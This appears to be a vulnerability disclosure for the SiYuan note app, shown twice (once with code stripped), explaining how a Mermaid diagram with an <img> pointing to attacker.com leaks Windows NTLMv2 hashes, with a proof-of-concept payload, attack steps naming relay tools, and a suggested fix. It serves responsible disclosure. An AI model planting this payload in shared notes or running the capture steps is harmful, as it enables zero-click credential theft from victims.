Hi,
SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.
On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker.
Root Cause
Mermaid initialization at app/src/protyle/render/mermaidRender.ts lines 28 and 33:
mermaid.initialize({
securityLevel: "loose",
flowchart: {
htmlLabels: true,
},
});
SVG injection at line 101:
renderElement.lastElementChild.innerHTML = mermaidData.svg;
No DOMPurify or other sanitization between the Mermaid output and DOM insertion.
Mermaid v11.12.0 in "loose" mode strips active JavaScript (<script>, onerror, onload) but explicitly allows <img> tags with src attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.
The Electron main process at app/electron/main.js line 78 sets disable-web-security, and lines 319+ set webSecurity: false, nodeIntegration: true, contextIsolation: false on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.
Proof of Concept
Mermaid code block in a SiYuan note:
```mermaid
graph TD
A["<img src='//attacker.com/share/img.png'>"] --> B[Normal Node]
```
Rendered SVG output (verified with Mermaid CLI 11.12.0, securityLevel: "loose", htmlLabels: true):
<foreignObject>
<div xmlns="http://www.w3.org/1999/xhtml">
<span class="nodeLabel">
<p><img src="//attacker.com/share/img.png" style="..."></p>
</span>
</div>
</foreignObject>
What was stripped by Mermaid's internal sanitizer (verified): onerror, onload, all event handler attributes, <script> tags, file:// URLs.
What survived (verified): <img src="http://...">, <img src="//...">.
Attack steps:
- Attacker creates a note or .sy export containing the Mermaid block above
- Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger)
- Victim imports the notebook or opens the shared note
- SiYuan renders the Mermaid diagram, injects SVG via innerHTML
- Electron fetches
//attacker.com/share/img.png
On Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker's SMB server.
On macOS/Linux: Electron makes an HTTP request to the attacker's server, leaking the victim's IP and confirming when the note was read.
Impact
Zero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim's machine.
No configuration changes required. The securityLevel: "loose" setting is hardcoded in SiYuan's Mermaid initialization.
Suggested Fix
Change Mermaid initialization to securityLevel: "strict". If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip <img> tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.
Koda Reef
Hi,
SiYuan configures Mermaid.js with
securityLevel: "loose"andhtmlLabels: true. In this mode,<img>tags withsrcattributes survive Mermaid's internal DOMPurify and land in SVG<foreignObject>blocks. The SVG is injected viainnerHTMLwith no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.On Windows, a protocol-relative URL (
//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker.Root Cause
Mermaid initialization at
app/src/protyle/render/mermaidRender.tslines 28 and 33:SVG injection at line 101:
No DOMPurify or other sanitization between the Mermaid output and DOM insertion.
Mermaid v11.12.0 in "loose" mode strips active JavaScript (
<script>,onerror,onload) but explicitly allows<img>tags withsrcattributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.The Electron main process at
app/electron/main.jsline 78 setsdisable-web-security, and lines 319+ setwebSecurity: false,nodeIntegration: true,contextIsolation: falseon all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.Proof of Concept
Mermaid code block in a SiYuan note:
Rendered SVG output (verified with Mermaid CLI 11.12.0,
securityLevel: "loose",htmlLabels: true):What was stripped by Mermaid's internal sanitizer (verified):
onerror,onload, all event handler attributes,<script>tags,file://URLs.What survived (verified):
<img src="http://...">,<img src="//...">.Attack steps:
//attacker.com/share/img.pngOn Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker's SMB server.
On macOS/Linux: Electron makes an HTTP request to the attacker's server, leaking the victim's IP and confirming when the note was read.
Impact
Zero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim's machine.
No configuration changes required. The
securityLevel: "loose"setting is hardcoded in SiYuan's Mermaid initialization.Suggested Fix
Change Mermaid initialization to
securityLevel: "strict". If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip<img>tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.Koda Reef